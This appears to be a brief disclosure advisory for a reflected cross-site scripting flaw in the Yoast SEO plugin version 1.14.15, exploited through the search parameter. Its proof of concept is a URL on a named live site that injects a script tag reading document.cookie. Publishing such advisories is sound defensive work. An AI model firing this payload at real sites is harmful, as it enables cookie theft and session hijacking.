Yoast SEO plugin version 1.14.15 suffers from a cross site scripting vulnerability.
e79c1607fa6d28dd9310146097ffc716
Discussion:
Yoast SEO Plugin v1.14.15 has a xss vulnerability due to lack of search
sanitation.
Exploit:
This can be exploited with a browser and is usually executed inside the
search parameter of the website.
Proof of concept:
http://5linx.com/?s="><script>alert(document.cookie);</script>
Comments
Subscribe to this comment feedNo comments yet, be the first!